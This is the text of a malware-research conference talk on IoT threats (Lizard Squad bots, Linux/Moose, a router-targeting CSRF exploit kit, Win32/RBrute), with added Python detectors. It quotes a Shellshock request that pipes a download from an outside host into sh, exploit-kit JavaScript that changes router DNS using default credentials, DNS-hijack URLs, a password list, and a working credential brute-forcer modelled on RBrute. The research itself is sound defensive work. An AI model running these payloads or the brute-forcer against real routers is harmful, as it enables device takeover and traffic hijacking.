IoT or Internet of {Things, Threats}
Thomas (@nyx__o)
- Malware Researcher at ESET
- CTF lover
- Open source contributor
Olivier (@obilodeau)
- Security Researcher at GoSecure
- Previously Malware Researcher at ESET
- Infosec lecturer at ETS University in Montreal
- Infosec developer, network admin, Linux system admin
- Co-founder of Montrehack (hands-on security workshops)
- Founder of NorthSec Hacker Jeopardy
Agenda
- About IoT
- Lizard Squad
- Linux/Moose
- Exploit Kit
- Win32/RBrute
- Conclusion
Why It Matters?
- Hard to detect
- Hard to remediate
- Hard to fix
- Low-hanging fruit for bad guys
A Real Threat
- Several cases disclosed in the last two years
- A lot of same-old background noise (DDoSers)
- Things are only getting worse
Wait, is IoT malware really about things?
No. Not yet.
So what kind of malware can we find on such insecure devices?
Lizard Squad
Who are Lizard Squad?
- Black hat hacking group
- Lots of Distributed Denial of Service (DDoS)
- DDoS against PlayStation Network and Xbox Live at Christmas 2014
- Bomb threats
- DDoS for hire (LizardStresser)
CYBER-RASCALS!
The Malware
- Linux/Gafgyt
- Linux/Powbot, Linux/Aidra, Kaiten, …
- Probably others, as the source is public
Characteristics
- Telnet scanner
- Flooding: UDP, TCP, Junk and Hold
Some Server Code

```
"*****************************************"
"*        WELCOME TO THE BALLPIT         *"
"*    Now with *refrigerator* support    *"
"*****************************************"
```
Attack Vectors
- Shellshock
- SSH credentials brute-force
- Telnet credentials brute-force
Example of a Shellshock Attempt

```http
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: () { goo;}; wget -qO- http://o.kei.su/qn | sh > /dev/null 2>&1 &
```
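A detection-side counterpart to the request above, added here as an example (not code from the deck or from the bot authors): it parses raw HTTP request heads and flags any CGI-exported header whose value starts with a bash function definition, which is the Shellshock trigger shape. The CGI_EXPORTED_HEADERS set and the two sample requests are constructed; the download URL in the sample is a placeholder.

```python
import re
from typing import Dict, Iterable, List

# A Shellshock payload is a bash function definition "() { ...; }" placed in
# a header that the CGI wrapper exports as an environment variable, followed
# by the command the vulnerable bash runs. Spacing varies between bots, so
# the pattern tolerates optional whitespace around the braces.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;")

# Headers CGI servers export into the environment (constructed list, based
# on the CGI HTTP_* variable convention); only these can carry the payload.
CGI_EXPORTED_HEADERS = {"user-agent", "referer", "cookie", "host", "accept"}


def parse_request(raw: str) -> Dict[str, str]:
    """Parse a raw HTTP/1.x request head into {lowercased header: value}.

    The request line is kept under the synthetic key "request-line".
    """
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    headers = {"request-line": lines[0]}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def shellshock_hits(raw_request: str) -> List[str]:
    """Return the names of headers carrying a Shellshock-style payload."""
    headers = parse_request(raw_request)
    return [
        name for name, value in headers.items()
        if name in CGI_EXPORTED_HEADERS and SHELLSHOCK_RE.search(value)
    ]


def scan_requests(requests: Iterable[str]) -> List[Dict[str, str]]:
    """Scan many captured requests; one finding per suspicious request."""
    findings = []
    for raw in requests:
        hits = shellshock_hits(raw)
        if hits:
            headers = parse_request(raw)
            findings.append({
                "request": headers["request-line"],
                "headers": ",".join(sorted(hits)),
                "payload": headers[hits[0]],
            })
    return findings


# Constructed sample traffic: the first request mirrors the shape of the
# attempt shown in the deck (same target URL, download host replaced by a
# placeholder); the second is a benign request with stray braces/parens.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "User-Agent: () { goo;}; wget -qO- http://payload.example.invalid/x | sh > /dev/null 2>&1 &\r\n"
    "\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) {} ()\r\n"
    "\r\n",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(f"ALERT {finding['request']} via {finding['headers']}: {finding['payload']}")
```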
Other Variants
- HTTPS support
- CloudFlare protection bypass
Sophisticated?
- LizardStresser database was leaked
- Passwords in plaintext…
IRC Command and Control

```
------- Day changed to 08/25/15 -------
09:32 -!- There are 0 users and 2085 invisible on 1 servers
09:32 -!- 42 unknown connection(s)
09:32 -!- 3 channels formed
09:32 -!- I have 2085 clients and 0 servers
09:32 -!- 2085 2119 Current local users 2085, max 2119
09:32 -!- 2085 2119 Current global users 2085, max 2119
```
Bot Masters

```
12:56 -!- Topic for #Fazzix: 1k
12:56 -!- Topic set by void <> (Wed Aug 19 09:58:45 2015)
12:56 [Users #Fazzix]
12:56 [~void] [~void_] [@bob1k] [@Fazzix] [ Myutro]
12:56 -!- Irssi: #Fazzix: Total of 5 nicks (4 ops, 0 halfops, 0 voices, 1 normal)
12:56 -!- Channel #Fazzix created Mon Aug 17 03:11:29 2015
12:56 -!- Irssi: Join to #Fazzix was synced in 2 secs
```
Linux/Moose
Linux/Moose
- Discovered in November 2014
- Thoroughly analyzed in early 2015
- Published a report in late May 2015
Moose DNA, aka Malware Description
Hang tight, this is a recap
Linux/Moose…
Named after the string "elan" present in the malware executable
Elan…?
The Lotus Elan
Elán, the Slovak rock band (from 1969 and still active)
Network Capabilities
- Pivot through firewalls
- Home-made NAT traversal
- Custom-made proxy service only available to a set of whitelisted IP addresses
- Remotely configured generic network sniffer
Attack Vector
- Telnet credentials brute-force
- Wordlist of 304 user/pass entries sent by the server
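Both the Lizard Squad bots and Linux/Moose get in by brute-forcing Telnet credentials, so the defender's signal on the device side is a burst of failed logins from one source cycling through usernames, possibly followed by a success. The detector below is an added example, not code from the deck; the util-linux-style syslog lines, the window and the threshold are constructed assumptions.

```python
import re
from collections import deque
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample in the util-linux "login" syslog format (the deck shows
# no device logs). 203.0.113.7 cycles through usernames the way a
# wordlist-driven bot does and then gets in as "admin"; 198.51.100.4 is a
# person mistyping a password twice, minutes apart.
SAMPLE_LOG = """\
Jan 12 09:32:01 gw login[412]: FAILED LOGIN 1 FROM 203.0.113.7 FOR root, Authentication failure
Jan 12 09:32:02 gw login[413]: FAILED LOGIN 1 FROM 203.0.113.7 FOR admin, Authentication failure
Jan 12 09:32:02 gw login[414]: FAILED LOGIN 1 FROM 203.0.113.7 FOR support, Authentication failure
Jan 12 09:32:03 gw login[415]: FAILED LOGIN 1 FROM 203.0.113.7 FOR root, Authentication failure
Jan 12 09:32:04 gw login[416]: FAILED LOGIN 1 FROM 203.0.113.7 FOR user, Authentication failure
Jan 12 09:32:04 gw login[417]: FAILED LOGIN 1 FROM 203.0.113.7 FOR guest, Authentication failure
Jan 12 09:32:05 gw login[418]: LOGIN ON pts/0 BY admin FROM 203.0.113.7
Jan 12 09:35:10 gw login[420]: FAILED LOGIN 1 FROM 198.51.100.4 FOR admin, Authentication failure
Jan 12 09:40:10 gw login[421]: FAILED LOGIN 1 FROM 198.51.100.4 FOR admin, Authentication failure
"""

SYSLOG_TS = r"(\w{3} +\d+ \d\d:\d\d:\d\d)"
FAIL_RE = re.compile(SYSLOG_TS + r" \S+ login\[\d+\]: FAILED LOGIN \d+ FROM (\S+) FOR (\S+),")
OK_RE = re.compile(SYSLOG_TS + r" \S+ login\[\d+\]: LOGIN ON \S+ BY (\S+) FROM (\S+)")


def parse_ts(text: str) -> datetime:
    """Syslog timestamps carry no year; any fixed year works for differences."""
    return datetime.strptime(text, "%b %d %H:%M:%S").replace(year=2015)


def detect_telnet_bruteforce(log: str, window_s: int = 60,
                             threshold: int = 5) -> List[Dict[str, object]]:
    """Flag sources with >= threshold failures inside a window_s-second window.

    A later successful login from a flagged source upgrades the finding to
    "bruteforce-then-success", the case that needs an immediate response.
    """
    state: Dict[str, dict] = {}
    window = timedelta(seconds=window_s)
    for line in log.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts, src, user = parse_ts(m.group(1)), m.group(2), m.group(3)
            s = state.setdefault(src, {"recent": deque(), "failures": 0,
                                       "users": set(), "flagged": False,
                                       "success_user": None})
            s["recent"].append(ts)
            while ts - s["recent"][0] > window:  # slide the window forward
                s["recent"].popleft()
            s["failures"] += 1
            s["users"].add(user)
            if len(s["recent"]) >= threshold:
                s["flagged"] = True
            continue
        m = OK_RE.match(line)
        if m and m.group(3) in state and state[m.group(3)]["flagged"]:
            state[m.group(3)]["success_user"] = m.group(2)

    findings = []
    for src, s in state.items():
        if s["flagged"]:
            findings.append({
                "source": src,
                "kind": "bruteforce-then-success" if s["success_user"] else "bruteforce",
                "failures": s["failures"],
                "users": sorted(s["users"]),
                "success_user": s["success_user"],
            })
    return findings


if __name__ == "__main__":
    for f in detect_telnet_bruteforce(SAMPLE_LOG):
        print(f"{f['kind']}: {f['source']} {f['failures']} failures, "
              f"users={f['users']}, got in as {f['success_user']}")
```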
CompromiseProtocol
Anti-Analysis
- Statically linked binary stripped of its debugging symbols
- Hard-to-reproduce environment required for the malware to operate
- Misleading strings (getcool.com)
Moose Herding: The Malware Operation
Via C&C Configuration
- Network sniffer was used to steal HTTP cookies
  - Twitter: twll, twid
  - Facebook: c_user
  - Instagram: ds_user_id
  - Google: SAPISID, APISID
  - Google Play/Android: LAY_ACTIVE_ACCOUNT
  - Youtube: LOGIN_INFO
Via Proxy Usage Analysis
- Nature of traffic
- Protocol
- Targeted social networks
AnExample
An Example (cont.)
An Example (cont.)
An Example (cont.)
Anti-Tracking
- Proxy access is protected by an IP-based whitelist
- So we can't use the proxy service to evaluate the malware population
- Blind because of HTTPS enforced on social networks
A Strange Animal
- not in the DDoS or bitcoin mining business
- no x86 variant found
- controlled by a single group of actors
Status
Whitepaper Impact
- A few weeks after the publication the C&C servers went dark
- After a reboot, all affected devices should be cleaned
- But victims were compromised via weak credentials, so they can always be reinfected
Alive or dead?
Yay! Except…
Linux/Moose Update
- New sample in September
- New proxy service port (20012)
- New C&C selection algorithm
- Few differences
- Still under scrutiny
Exploit Kit Targeting Routers
Exploit Kit Definition
- Automates exploitation
- Targets browsers
- Common exploits are Adobe and Java
Source: Malwarebytes
Exploit Kit in Action
Exploit Kit in Action (cont.)
- Cross-Site Request Forgery (CSRF)
- Uses default credentials (HTTP)
- Changes the primary Domain Name System (DNS) server
Exploit Kit CSRF

```html
<html>
<head>
<script type="text/javascript" src
<body>
<iframe id="iframe" sandbox="allow-same-origin"
<script language="javascript">
```
Exploit Kit How-To

```javascript
function e_belkin(ip) {
    var method = "POST";
    var url = "";
    var data = "";
    url = "http://" + ip + "/cgi-bin/login.exe?pws=admin"
    exp(url, "", "GET");
    url = "http://" + ip + "/cgi-bin/setup_dns.exe";
    data = "dns1_1=" + pDNS.split('.')[0] + "&dns1_2="
    exp(url, data, method);
}
```
Exploit Kit continually improved
- Obfuscation
- Exploits for CVEs
Exploit Kit - CVE
- CVE-2015-1187: D-Link DIR-636L Remote Command Injection
- Incorrect Authentication
Recap: Exploit Kit
- Changes DNS
- Fileless
What Can They Do?
- Universal XSS on all HTTP sites fetching Javascript from a 3rd-party domain
- Phishing
- Ad fraud
You Said Ad Fraud?
- Injection via Google Analytics domain hijacking
- Javascript runs in the context of every page
Example of Google Analytics Substitution

```javascript
'adcash': function() {
    var adcash = document.createElement('script');
    adcash.type = 'text/javascript';
    adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944'
    document.body.appendChild(adcash);
},
```
Win32/RBrute (cont.)
- Tries to find administration web pages (IP)
- Scan and report
- Router model is extracted from the realm attribute of the HTTP authentication
Win32/RBrute Targets

```
$ strings rbrute.exe
[...]
TD-W8901G
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-W8961ND
TD-8816
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
ZXV10 W300
[...]
DSL-2520U
DSL-2600U
DSL router
TD-W8901G
TD-W8901G 3.0
TD-W8901GB
TD-W8951ND
TD-W8961ND
```
![Page 88](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/88.jpg)
Win32/RBrute Bruteforce
Logins: admin, support, root & Administrator
Password list retrieved from the CnC:
<empty string>, 111111, 12345, 123456, 12345678, abc123, admin, Administrator, consumer, dragon, gizmodo, iqrquksm, letmein, lifehack, monkey, password, qwerty, root, soporteETB2006, support
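The three slides above describe one pipeline: read the realm out of the router's Basic-auth challenge, match it against the model list, then replay the login and password lists. The Python below is an added example (not the talk's or RBrute's code) that implements that pipeline against an in-memory mock router, so it runs offline; the `attempt` callback is the only thing to swap to audit a router you own. Assumptions: the lists are the ones shown on the slides, the ordering (each login against the whole password list) and the mock's credentials are made up for the example.

```python
import base64
import itertools
import re
from typing import Callable, Optional

# Router models found in the RBrute binary (from the strings listing on the slide).
RBRUTE_TARGET_MODELS = {
    "TD-W8901G", "TD-W8901G 3.0", "TD-W8901GB", "TD-W8951ND", "TD-W8961ND",
    "TD-8840T", "TD-8816", "TD-8817", "TD-W8151N", "TD-W8101G",
    "ZXDSL 831CII", "ZXV10 W300", "DSL-2520U", "DSL-2600U", "DSL router",
}
RBRUTE_LOGINS = ["admin", "support", "root", "Administrator"]
RBRUTE_PASSWORDS = [
    "", "111111", "12345", "123456", "12345678", "abc123", "admin",
    "Administrator", "consumer", "dragon", "gizmodo", "iqrquksm", "letmein",
    "lifehack", "monkey", "password", "qwerty", "root", "soporteETB2006", "support",
]

_REALM_RE = re.compile(r'realm\s*=\s*"([^"]*)"', re.IGNORECASE)


def model_from_www_authenticate(header: str) -> Optional[str]:
    """'Basic realm="TD-W8901G"' -> 'TD-W8901G'; None when no realm is present."""
    m = _REALM_RE.search(header)
    return m.group(1).strip() if m else None


def is_rbrute_target(header: str) -> bool:
    """True when the challenge's realm names a model on RBrute's list."""
    model = model_from_www_authenticate(header)
    return model is not None and model in RBRUTE_TARGET_MODELS


def basic_auth_header(login: str, password: str) -> str:
    token = base64.b64encode(f"{login}:{password}".encode()).decode()
    return f"Basic {token}"


def bruteforce(attempt: Callable[[str], bool]) -> tuple[Optional[tuple[str, str]], int]:
    """Replay the credential lists; `attempt` gets an Authorization header value
    and returns True when the target accepts it. Returns (credentials or None, tries).
    Order (every password per login) is an assumption, not documented behaviour."""
    tries = 0
    for login, password in itertools.product(RBRUTE_LOGINS, RBRUTE_PASSWORDS):
        tries += 1
        if attempt(basic_auth_header(login, password)):
            return (login, password), tries
    return None, tries


class MockRouter:
    """In-memory stand-in for a router admin page (constructed for this example)."""

    def __init__(self, model: str, login: str, password: str):
        self.challenge = f'Basic realm="{model}"'
        self._expected = basic_auth_header(login, password)
        self.attempts = 0

    def check(self, authorization: str) -> bool:
        self.attempts += 1
        return authorization == self._expected


if __name__ == "__main__":
    router = MockRouter("TD-W8901G", "admin", "123456")
    if is_rbrute_target(router.challenge):
        creds, tries = bruteforce(router.check)
        print("targeted model; credentials found:", creds, "after", tries, "tries")
```

Two practical notes: the realm lookup only works for routers that actually challenge with Basic auth (a form-based login exposes no realm), and a mock that accepts the fourth attempt shows how few requests a weak default needs, which is the signal to alert on (a burst of 401s on the LAN gateway from one host).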
![Page 89](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/89.jpg)
Win32/RBrute Changing DNS
Once authenticated, the DNS servers are changed with plain HTTP requests to the router's configuration handler (the URL form varies with the router's web interface; note Google Public DNS, 8.8.8.8, as the secondary):

http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Save
http://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>
http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=
![Page 90](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/90.jpg)
Win32/RBrute Next Step
Simple redirection to a fake Chrome installer (served for Facebook or Google domains)
Install (user action required)
Change the primary DNS on the computer (via a registry key):
HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{network interface UUID}\NameServer
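Both persistence points above reduce to the same check: a resolver address that is not one of yours, either in a router DNS-change request (the URL forms on the previous slide) or in the per-interface NameServer registry value. The following is an added example (not code from the talk) that does that check in Python over captured requests and over an exported NameServer value, so it runs offline; point it at proxy or IDS logs and at `reg export` output respectively. The allow-list, the TEST-NET address standing in for `<malicious_DNS>`, the secondary parameter names and the sample values are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import unquote

# Parameter names from the three URL forms on the slide; the two secondary
# variants beyond dnsserver2 are assumptions added for completeness.
DNS_PARAMS = ("dnsserver", "dnsserver2", "dnsPrimary", "dnsSecondary")

# Constructed allow-list: the gateway itself and Google Public DNS.
ALLOWED_RESOLVERS = {"192.168.1.1", "8.8.8.8", "8.8.4.4"}

# Lenient on purpose: RBrute's first form puts '&' right after '/' with no '?',
# so a strict query-string parser would miss it.
_PARAM_RE = re.compile(r"(?<!\w)(" + "|".join(DNS_PARAMS) + r")=([^&#\s]*)")


def dns_params_from_url(url: str) -> dict[str, str]:
    """DNS-server parameters present in a router configuration request."""
    return {name: unquote(value) for name, value in _PARAM_RE.findall(url)}


def rogue_resolvers(values, allowed=ALLOWED_RESOLVERS) -> list[str]:
    """Values that are IP addresses and not on the allow-list."""
    rogue = []
    for v in values:
        v = v.strip()
        if not v:
            continue            # empty: parameter unset or truncated
        try:
            ipaddress.ip_address(v)
        except ValueError:
            continue            # not an address; nothing a resolver check can judge
        if v not in allowed:
            rogue.append(v)
    return rogue


def check_router_request(url: str, allowed=ALLOWED_RESOLVERS) -> list[str]:
    """Rogue resolvers a router DNS-change request would install, if any."""
    return rogue_resolvers(dns_params_from_url(url).values(), allowed)


def check_nameserver_value(reg_value: str, allowed=ALLOWED_RESOLVERS) -> list[str]:
    """Same check for the NameServer registry value: a comma-separated list of
    resolvers; an empty value means the interface uses DHCP-assigned servers."""
    return rogue_resolvers(reg_value.split(","), allowed)


# Constructed samples: the slide's URL forms with 203.0.113.5 (TEST-NET) as the
# malicious resolver, a benign change, and a NameServer value as RBrute would set it.
SAMPLE_REQUESTS = [
    "http://192.168.1.1/&dnsserver=203.0.113.5&dnsserver2=8.8.8.8&Save=Save",
    "http://192.168.1.1/dnscfg.cgi?dnsPrimary=203.0.113.5",
    "http://192.168.1.1/Enable_DNSFollowing=1&dnsPrimary=",
    "http://192.168.1.1/dnscfg.cgi?dnsPrimary=8.8.8.8",
]
SAMPLE_NAMESERVER = "203.0.113.5,8.8.8.8"

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", check_router_request(req) or "ok")
    print("NameServer:", check_nameserver_value(SAMPLE_NAMESERVER) or "ok")
```

The same allow-list serves both checks because RBrute keeps a legitimate resolver as the secondary: a host that only inspects the secondary entry, or only checks that DNS still works, sees nothing wrong, which is why the primary entry is what to compare.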
![Page 91](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/91.jpg)
Why reinfect someone through RBrute and not Sality?
![Page 92](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/92.jpg)
Win32/RBrute In A Coffee Shop
Infected user → infected router → everyone is infected
![Page 93](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/93.jpg)
RBrute and Sality
![Page 94](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/94.jpg)
Conclusion
Embedded malware:
Not yet complex
Tools and processes need to catch up
A low-hanging fruit
Prevention is simple
![Page 95](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/95.jpg)
Thanks!
Special thanks to the ESET Canada Research Team
![Page 96](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/96.jpg)
Questions?
@obilodeau @nyx__o
![Page 97](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/97.jpg)
References
http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf
http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html
https://gist.github.com/josephwegner/1d20f1ce1d59b61172e1
http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/